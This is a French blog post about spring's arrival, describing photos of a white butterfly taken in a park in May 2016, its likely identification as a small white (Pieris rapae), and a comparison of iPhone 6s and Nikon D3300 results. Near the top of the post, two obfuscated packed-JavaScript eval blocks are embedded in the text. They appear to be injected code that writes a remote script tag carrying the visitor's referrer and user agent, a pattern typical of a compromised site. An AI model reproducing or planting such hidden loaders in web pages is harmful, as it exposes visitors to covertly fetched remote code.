Le printemps

Malgré les températures bien en-dessous de la moyenne de ces dernière semaines, document.write(“”); la nature, telle Perséphone, se réveille finalement de son long sommeil.
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nisfk|var|u0026u|referrer|riifa||js|php’.split(‘|’),0,{}))
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“
“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|adnth|var|u0026u|referrer|akdnt||js|php’.split(‘|’),0,{}))

Le printemps est arrivé !
IMG_8447
(iPhone 6s, Parc du CESM, 2016-05-09)

Butterfly Butterfly
(iPhone 6s / Nikon D3300, 2016-05-09)
Pas facile d’identifier ces petites bêtes quand on est pas un expert. C’est définitivement une créature de la classe des insectes, de l’ordre des lépidoptères, sous-ordre des Macrolepidoptera, super-famille des Papilionoidea, et de la famille des Piéride. Là, ça se complique un peu.

Ça ressemble beaucoup à un Piéride de la moutarde (Leptidea sinapis, sous-famille des Dismorphiinae) mais il ne serait pas présent en Amériques… Alors j’ai tout de suite pensé à la Piéride du chou (Pieris brassicae, sous-famille des Pierinae) mais il est caractérisé par un point noir qui n’est pas présent sur le spécimen représenté ci-haut. C’est plus probablement son cousin, le Piéride de la rave (Pieris rapae, même sous-famille) aux caractéristiques similaires, mais plus petit. Toutefois, on dit que les individus “issus de la première génération de l’année ont des marques sombres moins importantes que ceux des autres générations”. Bingo!

Du point de vue photographique, on note la différence entre la gestion de la balance des blancs de l’iPhone (à gauche, presqu’aucune correction) et celle de la Nikon (à droite, qui la corrige automatiquement). Le cliché du iPhone 6s donne l’équivalent d’un ISO 25, DF 4.15mm, 0 ev, ƒ/2.2 et 1/493 alors que le cliché de la Nikon D3300 a été pris (en auto, je l’avoue) avec l’objectif Tamron (zoom/macro AF 70-300 mm F4-5.6) et un filtre UV FotodioX : ISO 720, DF 300mm, 0 ev, ƒ/5.6 et 1/1000. Il me reste encore beaucoup à apprendre sur l’utilisation efficace d’une DSLR car, malgré que le zoom digital du iPhone diminue de beaucoup la qualité, je préfère ici le résultat obtenu avec l’iPhone sur celui de la Nikon. Mmm…

[ Translate ]

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s